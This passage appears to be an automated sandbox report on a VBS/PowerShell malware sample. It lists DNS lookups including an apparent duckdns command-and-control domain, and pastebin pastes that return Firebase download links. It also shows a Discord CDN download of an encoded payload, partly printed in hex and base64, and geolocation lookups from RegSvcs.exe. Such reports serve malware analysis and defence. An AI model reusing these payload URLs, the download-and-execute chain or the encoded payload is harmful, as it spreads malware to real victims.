                            Jul 10, 2024 19:53:14.964159012 CEST1.1.1.1192.168.2.40xe51dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:14.964159012 CEST1.1.1.1192.168.2.40xe51dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:14.964159012 CEST1.1.1.1192.168.2.40xe51dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:19.236865044 CEST1.1.1.1192.168.2.40x49No error (0)remcoss2024feb.duckdns.org191.98.25.251A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:19.236913919 CEST1.1.1.1192.168.2.40x49No error (0)remcoss2024feb.duckdns.org191.98.25.251A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:19.236947060 CEST1.1.1.1192.168.2.40x49No error (0)remcoss2024feb.duckdns.org191.98.25.251A (IP address)IN (0x0001)false
                            Jul 10, 2024 19:53:20.763962030 CEST1.1.1.1192.168.2.40x472dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                            • pastebin.com
                            • cdn.discordapp.com
                            • geoplugin.net
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730104.20.4.235804908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            Jul 10, 2024 19:53:08.802747011 CEST74OUTGET /raw/V9y5Q5vv HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            Jul 10, 2024 19:53:09.292512894 CEST472INHTTP/1.1 301 Moved Permanently
                            Date: Wed, 10 Jul 2024 17:53:09 GMT
                            Content-Type: text/html
                            Content-Length: 167
                            Connection: keep-alive
                            Cache-Control: max-age=3600
                            Expires: Wed, 10 Jul 2024 18:53:09 GMT
                            Location: https://pastebin.com/raw/V9y5Q5vv
                            Server: cloudflare
                            CF-RAY: 8a126960ad877cfa-EWR
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449737178.237.33.50806736C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            TimestampBytes transferredDirectionData
                            Jul 10, 2024 19:53:20.773017883 CEST71OUTGET /json.gp HTTP/1.1
                            Host: geoplugin.net
                            Cache-Control: no-cache
                            Jul 10, 2024 19:53:21.409580946 CEST1170INHTTP/1.1 200 OK
                            date: Wed, 10 Jul 2024 17:53:21 GMT
                            server: Apache
                            content-length: 962
                            content-type: application/json; charset=utf-8
                            cache-control: public, max-age=300
                            access-control-allow-origin: *
                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                            Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449731104.20.4.2354434908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-07-10 17:53:09 UTC74OUTGET /raw/V9y5Q5vv HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-07-10 17:53:10 UTC391INHTTP/1.1 200 OK
                            Date: Wed, 10 Jul 2024 17:53:10 GMT
                            Content-Type: text/plain; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-frame-options: DENY
                            x-content-type-options: nosniff
                            x-xss-protection: 1;mode=block
                            cache-control: public, max-age=1801
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Wed, 10 Jul 2024 15:12:58 GMT
                            Server: cloudflare
                            CF-RAY: 8a126964afe91855-EWR
                            2024-07-10 17:53:10 UTC154INData Raw: 39 34 0d 0a 68 74 74 70 73 3a 2f 2f 66 69 72 65 62 61 73 65 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 76 30 2f 62 2f 72 6f 64 72 69 61 6b 64 2d 38 34 31 33 64 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 64 6c 6c 25 32 46 74 65 73 74 25 32 30 62 61 62 65 6c 2e 74 78 74 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 37 62 37 36 66 36 36 36 2d 34 30 64 66 2d 34 30 38 65 2d 39 62 31 62 2d 39 32 36 64 34 66 65 61 33 33 63 32 0d 0a
                            Data Ascii: 94https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Ftest%20babel.txt?alt=media&token=7b76f666-40df-408e-9b1b-926d4fea33c2
                            2024-07-10 17:53:10 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449733104.20.4.2354434908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-07-10 17:53:13 UTC50OUTGET /raw/sFgsbG3v HTTP/1.1
                            Host: pastebin.com
                            2024-07-10 17:53:13 UTC391INHTTP/1.1 200 OK
                            Date: Wed, 10 Jul 2024 17:53:13 GMT
                            Content-Type: text/plain; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-frame-options: DENY
                            x-content-type-options: nosniff
                            x-xss-protection: 1;mode=block
                            cache-control: public, max-age=1801
                            CF-Cache-Status: EXPIRED
                            Last-Modified: Wed, 10 Jul 2024 07:25:47 GMT
                            Server: cloudflare
                            CF-RAY: 8a126978ef2a7c8e-EWR
                            2024-07-10 17:53:13 UTC148INData Raw: 38 65 0d 0a 68 74 74 70 73 3a 2f 2f 66 69 72 65 62 61 73 65 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 76 30 2f 62 2f 72 6f 64 72 69 61 6b 64 2d 38 34 31 33 64 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 50 65 25 32 46 70 25 32 30 6d 69 6f 2e 74 78 74 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 33 33 30 33 33 30 64 36 2d 63 62 64 35 2d 34 61 31 30 2d 61 39 35 64 2d 62 62 38 33 39 62 36 37 33 34 32 33 0d 0a
                            Data Ascii: 8ehttps://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2Fp%20mio.txt?alt=media&token=330330d6-cbd5-4a10-a95d-bb839b673423
                            2024-07-10 17:53:13 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449735162.159.129.2334434908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampBytes transferredDirectionData
                            2024-07-10 17:53:15 UTC224OUTGET /attachments/1215337232609714261/1260301846166245438/envi9.7.txt?ex=668ed30f&is=668d818f&hm=a1bad6d076519c9b6da1f5993a85c58a2178d013d09a631c6546fb3f4e81d086& HTTP/1.1
                            Host: cdn.discordapp.com
                            Connection: Keep-Alive
                            2024-07-10 17:53:15 UTC1178INHTTP/1.1 200 OK
                            Date: Wed, 10 Jul 2024 17:53:15 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 659456
                            Connection: close
                            CF-Ray: 8a1269881c1242b3-EWR
                            CF-Cache-Status: MISS
                            Accept-Ranges: bytes, bytes
                            Cache-Control: public, max-age=31536000
                            Content-Disposition: attachment; filename="envi9.7.txt"
                            ETag: "5289ffcba090acff0c2c6eba826e62a3"
                            Expires: Thu, 10 Jul 2025 17:53:15 GMT
                            Last-Modified: Tue, 09 Jul 2024 18:29:35 GMT
                            Vary: Accept-Encoding
                            alt-svc: h3=":443"; ma=86400
                            x-goog-generation: 1720549775463172
                            x-goog-hash: crc32c=xCK2mw==
                            x-goog-hash: md5=Uon/y6CQrP8MLG66gm5iow==
                            x-goog-metageneration: 1
                            x-goog-storage-class: STANDARD
                            x-goog-stored-content-encoding: identity
                            x-goog-stored-content-length: 659456
                            x-guploader-uploadid: ACJd0NojyJb3SJzPI0e-Na0PLnzt3v4dBDXZrqxARID94G8LcZn40EZP9JYSLnA6qAvoBCELt6w
                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                            Set-Cookie: __cf_bm=2kBpA4syApGn3vTndRmFrBYbgi0idV.UNjetK3XXcLE-1720633995-1.0.1.1-m2_WelHgQh3mgLxkhndCFRxWKbvepZWKtRFl9Uo1SUmrIePB.rqFPowJ5ZbCD8.KojOSIYTnROy15pZEuseJmQ; path=/; expires=Wed, 10-Jul-24 18:23:15 GMT; domain=.discordapp.com; HttpOnly; Secure
                            2024-07-10 17:53:15 UTC531INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 25 32 42 44 78 42 57 43 77 25 32 46 67 4e 35 25 32 46 43 4f 39 25 32 42 67 69 46 32 57 38 39 42 53 31 58 77 75 68 25 32 46 6c 4d 58 70 32 58 41 47 59 49 25 32 42 58 6a 68 47 35 48 59 54 33 62 72 53 6a 25 32 42 46 25 32 46 4f 50 33 6b 62 6b 44 59 76 36 51 47 6e 54 79 62 52 25 32 42 63 6c 25 32 46 6e 25 32 46 6d 76 50 54 53 35 78 75 63 53 36 42 67 30 68 79 53 53 39 6b 72 4e 58 7a 4a 46 62 75 45 30 78 48 55 42 66 70 79 43 52 35 64 4c 59 4c 45 31 70 6f 45 7a 33 67 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66
                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDxBWCw%2FgN5%2FCO9%2BgiF2W89BS1Xwuh%2FlMXp2XAGYI%2BXjhG5HYT3brSj%2BF%2FOP3kbkDYv6QGnTybR%2Bcl%2Fn%2FmvPTS5xucS6Bg0hySS9krNXzJFbuE0xHUBfpyCR5dLYLE1poEz3gQ%3D%3D"}],"group":"cf
                            2024-07-10 17:53:15 UTC1029INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42
                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHAB
                            2024-07-10 17:53:15 UTC1369INData Raw: 63 44 46 33 51 67 4e 73 62 44 36 32 41 74 4e 49 62 44 78 32 41 73 4e 38 61 44 75 32 67 71 4e 6b 61 44 6c 32 77 6e 4e 30 5a 44 63 32 41 6d 4e 63 5a 44 54 32 51 6a 4e 73 59 44 4b 32 51 69 4e 55 59 44 45 32 41 51 4e 6f 58 44 34 31 77 64 4e 59 58 44 31 31 51 63 4e 41 58 44 73 31 67 5a 4e 51 57 44 6a 31 67 59 4e 45 57 44 64 31 41 58 4e 67 56 44 53 31 41 55 4e 38 55 44 4f 31 67 53 4e 6b 55 44 46 30 77 50 4e 30 54 44 38 30 77 4f 4e 6f 54 44 32 30 51 4e 4e 45 54 44 72 30 51 4b 4e 67 53 44 6e 30 77 49 4e 49 53 44 65 30 41 47 4e 59 52 44 56 30 51 45 4e 41 52 44 4d 30 67 42 4e 51 51 44 44 7a 77 2f 4d 34 50 44 34 7a 77 39 4d 59 50 44 31 7a 41 38 4d 34 4f 44 74 41 41 51 41 67 42 67 42 51 44 51 4f 59 6b 44 46 41 41 41 41 4d 41 67 42 41 44 41 41 41 30 44 34 41 41 41 41
                            Data Ascii: cDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN0TD80wONoTD20QNNETDr0QKNgSDn0wINISDe0AGNYRDV0QENARDM0gBNQQDDzw/M4PD4zw9MYPD1zA8M4ODtAAQAgBgBQDQOYkDFAAAAMAgBADAAA0D4AAAA
                            2024-07-10 17:53:15 UTC1369INData Raw: 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33 51 39 4e 4d 66 44 78 33 77 37 4e 30 65 44 72 33 51 36 4e 63 65 44 6c 33 77 34 4e 45 65 44 66 33 51 33 4e 73 64 44 5a 33 77 31 4e 55 64 44 54 33 51 30 4e 38 63 44 4e 33 77 79 4e 6b 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38
                            Data Ascii: Dd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8
                            2024-07-10 17:53:15 UTC1369INData Raw: 6a 35 67 59 4f 45 6d 44 67 35 77 58 4f 34 6c 44 64 35 41 58 4f 73 6c 44 61 35 51 57 4f 67 6c 44 54 35 67 55 4f 45 6c 44 51 34 51 46 4f 51 68 44 54 34 67 45 41 41 41 41 34 41 55 41 77 41 41 41 41 31 41 63 4e 34 57 44 73 31 67 61 4e 67 57 44 6d 31 41 5a 4e 49 57 44 67 31 67 58 4e 77 56 44 61 31 41 57 4e 59 56 44 55 31 67 55 4e 41 56 44 4f 31 41 54 4e 6f 55 44 49 31 67 52 4e 51 55 44 43 31 41 41 4e 34 54 44 38 30 67 4f 4e 67 54 44 32 30 41 4e 4e 49 54 44 77 30 67 4c 4e 77 53 44 71 30 41 4b 4e 59 53 44 6b 30 67 49 4e 41 53 44 65 30 41 48 4e 6f 52 44 59 30 67 46 4e 51 52 44 53 30 41 45 4e 34 51 44 4d 30 67 43 4e 67 51 44 47 30 41 42 4e 49 51 44 41 7a 67 2f 4d 77 50 44 36 7a 41 2b 4d 59 50 44 30 7a 67 38 4d 41 50 44 75 7a 41 37 4d 6f 4f 44 6f 7a 67 35 4d 51 4f
                            Data Ascii: j5gYOEmDg5wXO4lDd5AXOslDa5QWOglDT5gUOElDQ4QFOQhDT4gEAAAA4AUAwAAAA1AcN4WDs1gaNgWDm1AZNIWDg1gXNwVDa1AWNYVDU1gUNAVDO1ATNoUDI1gRNQUDC1AAN4TD80gONgTD20ANNITDw0gLNwSDq0AKNYSDk0gINASDe0AHNoRDY0gFNQRDS0AEN4QDM0gCNgQDG0ABNIQDAzg/MwPD6zA+MYPD0zg8MAPDuzA7MoODozg5MQO
                            2024-07-10 17:53:15 UTC1369INData Raw: 7a 77 7a 4d 34 4d 44 4e 7a 41 7a 4d 73 4d 44 4b 7a 51 79 4d 67 41 44 76 77 51 4c 4d 73 43 44 70 77 77 4a 4d 55 43 44 6a 77 51 49 4d 38 42 44 64 77 77 47 4d 6b 42 44 58 77 51 46 4d 4d 42 44 52 77 77 44 4d 30 41 44 4c 77 51 43 4d 63 41 44 46 77 77 41 4d 45 41 41 41 43 41 4b 41 46 41 4b 41 2f 77 2f 50 30 2f 44 37 2f 51 2b 50 63 2f 44 31 2f 77 38 50 45 2f 44 76 2f 51 37 50 73 2b 44 70 2f 77 35 50 55 2b 44 6a 2f 51 34 50 38 39 44 64 2f 77 32 50 6b 39 44 58 2f 51 31 50 4d 39 44 52 2f 77 7a 50 30 38 44 4c 2f 51 79 50 63 38 44 46 2f 77 77 50 45 34 44 2f 2b 51 76 50 73 37 44 35 2b 77 74 50 55 37 44 7a 2b 51 73 50 38 36 44 74 2b 77 71 50 6b 36 44 6e 2b 51 70 50 4d 36 44 68 2b 77 6e 50 30 35 44 62 2b 51 6d 50 63 35 44 56 33 77 37 4e 34 65 44 74 33 41 37 4e 73 65 44
                            Data Ascii: zwzM4MDNzAzMsMDKzQyMgADvwQLMsCDpwwJMUCDjwQIM8BDdwwGMkBDXwQFMMBDRwwDM0ADLwQCMcADFwwAMEAAACAKAFAKA/w/P0/D7/Q+Pc/D1/w8PE/Dv/Q7Ps+Dp/w5PU+Dj/Q4P89Dd/w2Pk9DX/Q1PM9DR/wzP08DL/QyPc8DF/wwPE4D/+QvPs7D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV3w7N4eDt3A7NseD
                            2024-07-10 17:53:15 UTC1369INData Raw: 77 68 50 41 36 54 51 39 49 34 4f 46 67 54 30 33 38 2b 4e 51 66 44 69 33 6b 33 4e 65 59 6a 79 32 41 73 4e 32 5a 6a 62 32 6b 52 4e 78 56 44 4c 31 55 52 4e 41 51 7a 31 30 45 4a 4e 62 4e 54 61 7a 38 68 4d 71 45 6a 61 78 6b 42 4d 50 44 44 68 77 73 48 4d 50 41 6a 42 41 41 41 41 4d 42 51 42 67 41 41 41 41 38 54 69 2f 41 6f 50 39 37 7a 73 39 77 62 50 4d 31 7a 46 38 63 43 50 55 73 44 6a 37 59 6c 4f 43 65 44 6d 33 34 6a 4e 4e 58 6a 35 31 55 63 4e 4e 56 44 4c 31 59 42 4e 64 54 7a 64 30 67 45 4e 65 4d 54 74 79 30 74 4d 51 4b 6a 46 79 51 51 4d 37 46 54 4e 41 41 41 41 49 42 51 42 51 41 41 41 41 38 6a 38 38 55 44 50 74 77 54 4a 38 30 42 50 57 6f 54 55 36 55 68 4f 44 6b 54 38 35 38 64 4f 4e 6e 44 47 32 38 53 4e 77 58 6a 33 31 77 63 4e 36 57 44 71 31 59 5a 4e 45 57 6a 63
                            Data Ascii: whPA6TQ9I4OFgT038+NQfDi3k3NeYjy2AsN2Zjb2kRNxVDL1URNAQz10EJNbNTaz8hMqEjaxkBMPDDhwsHMPAjBAAAAMBQBgAAAA8Ti/AoP97zs9wbPM1zF8cCPUsDj7YlOCeDm34jNNXj51UcNNVDL1YBNdTzd0gENeMTty0tMQKjFyQQM7FTNAAAAIBQBQAAAA8j88UDPtwTJ80BPWoTU6UhODkT858dONnDG28SNwXj31wcN6WDq1YZNEWjc
                            2024-07-10 17:53:15 UTC1369INData Raw: 41 6f 41 38 54 4c 2f 45 52 50 30 33 6a 76 39 4d 52 50 44 77 54 71 38 59 49 50 51 78 6a 50 38 63 77 4f 4d 76 54 73 37 45 34 4f 49 70 7a 30 36 55 73 4f 41 72 7a 73 36 30 70 4f 48 71 44 67 36 38 56 4f 76 64 7a 63 32 4d 71 4e 45 61 6a 59 31 51 66 4e 53 58 6a 77 31 30 61 4e 6a 57 6a 41 30 30 4f 4e 6b 54 7a 31 30 77 4d 4e 32 52 6a 62 30 6b 45 4e 42 52 7a 45 30 77 77 4d 37 50 54 38 7a 63 2b 4d 67 50 54 30 7a 73 38 4d 45 50 54 75 79 30 6a 4d 79 45 6a 30 78 6f 58 4d 30 46 6a 62 78 73 56 4d 4e 46 54 52 78 34 53 4d 6b 45 54 47 78 4d 52 4d 4f 41 54 36 77 41 4f 4d 38 43 44 74 77 55 48 4d 74 42 44 4c 77 45 43 41 41 41 41 6e 41 51 41 6b 41 41 41 41 2f 34 38 50 49 2f 54 59 2f 6b 31 50 4c 39 7a 51 2f 6f 7a 50 78 38 54 4b 2f 45 79 50 5a 38 6a 44 2b 77 76 50 30 37 44 36 2b
                            Data Ascii: AoA8TL/ERP03jv9MRPDwTq8YIPQxjP8cwOMvTs7E4OIpz06UsOArzs60pOHqDg68VOvdzc2MqNEajY1QfNSXjw10aNjWjA00ONkTz10wMN2Rjb0kENBRzE0wwM7PT8zc+MgPT0zs8MEPTuy0jMyEj0xoXM0FjbxsVMNFTRx4SMkETGxMRMOAT6wAOM8CDtwUHMtBDLwECAAAAnAQAkAAAA/48PI/TY/k1PL9zQ/ozPx8TK/EyPZ8jD+wvP07D6+
                            2024-07-10 17:53:15 UTC1369INData Raw: 4e 5a 51 54 42 7a 38 2f 4d 74 50 54 72 7a 49 35 4d 41 4f 7a 62 7a 59 32 4d 63 4e 44 56 7a 49 6b 4d 36 4c 54 38 79 38 74 4d 59 4c 6a 62 79 30 6c 4d 59 4a 44 54 79 63 6b 4d 30 49 44 4b 79 45 69 4d 4b 45 44 39 78 34 64 4d 50 48 7a 6e 78 67 57 4d 53 42 6a 48 41 41 41 41 30 43 41 42 77 41 41 41 41 38 54 37 2f 49 2b 50 48 2f 7a 6f 2f 63 34 50 31 35 7a 54 2b 45 6a 50 54 30 6a 7a 38 51 4f 50 58 7a 7a 78 38 6f 4c 50 43 73 6a 77 37 41 37 4f 6a 75 44 6d 37 51 33 4f 45 74 7a 4e 37 30 68 4f 79 71 6a 63 34 38 4d 4f 36 61 54 76 32 77 56 4e 53 58 44 69 31 4d 58 4e 5a 51 6a 78 7a 6b 72 4d 62 4c 44 75 79 67 59 4d 33 42 41 41 41 67 46 41 45 41 43 41 37 4d 78 4e 46 66 44 71 33 59 6c 4e 77 58 44 32 31 73 42 4e 69 54 44 76 30 41 34 4d 6a 4b 54 73 79 41 59 4d 69 48 54 6e 78 6f
                            Data Ascii: NZQTBz8/MtPTrzI5MAOzbzY2McNDVzIkM6LT8y8tMYLjby0lMYJDTyckM0IDKyEiMKED9x4dMPHznxgWMSBjHAAAA0CABwAAAA8T7/I+PH/zo/c4P15zT+EjPT0jz8QOPXzzx8oLPCsjw7A7OjuDm7Q3OEtzN70hOyqjc48MO6aTv2wVNSXDi1MXNZQjxzkrMbLDuygYM3BAAAgFAEACA7MxNFfDq3YlNwXD21sBNiTDv0A4MjKTsyAYMiHTnxo
                            2024-07-10 17:53:15 UTC1369INData Raw: 32 47 44 73 78 6f 61 4d 6b 47 7a 6e 78 6b 5a 4d 54 47 54 6a 78 67 59 4d 43 47 44 66 78 59 58 4d 78 46 7a 61 78 55 57 4d 66 46 6a 57 78 51 56 4d 4f 46 44 53 78 4d 55 4d 39 45 7a 4e 78 45 54 4d 73 45 6a 4a 78 41 53 4d 61 45 54 46 78 38 51 4d 4a 45 7a 41 77 34 50 4d 34 44 6a 38 77 77 4f 4d 6e 44 54 34 77 73 4e 4d 56 44 44 30 77 6f 4d 4d 45 44 6a 76 77 6b 4c 4d 7a 43 54 72 77 63 4b 4d 69 43 44 6e 77 59 4a 4d 51 43 7a 69 77 55 49 4d 2f 42 54 65 77 51 48 4d 75 42 44 61 77 49 47 4d 64 42 7a 56 77 45 46 4d 4c 42 6a 52 77 41 45 4d 36 41 44 4e 77 38 43 4d 70 41 7a 49 77 30 42 4d 59 41 6a 45 77 77 41 4d 47 41 54 41 41 41 51 41 59 41 77 41 67 42 41 41 41 38 7a 2b 2f 55 2f 50 76 2f 6a 36 2f 51 2b 50 65 2f 44 32 2f 4d 39 50 4e 2f 6a 78 2f 45 38 50 38 2b 6a 74 2f 41 37
                            Data Ascii: 2GDsxoaMkGznxkZMTGTjxgYMCGDfxYXMxFzaxUWMfFjWxQVMOFDSxMUM9EzNxETMsEjJxASMaETFx8QMJEzAw4PM4Dj8wwOMnDT4wsNMVDD0woMMEDjvwkLMzCTrwcKMiCDnwYJMQCziwUIM/BTewQHMuBDawIGMdBzVwEFMLBjRwAEM6ADNw8CMpAzIw0BMYAjEwwAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:13:53:04
                            Start date:10/07/2024
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\envifa.vbs"
                            Imagebase:0x7ff69e5a0000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:13:53:05
                            Start date:10/07/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
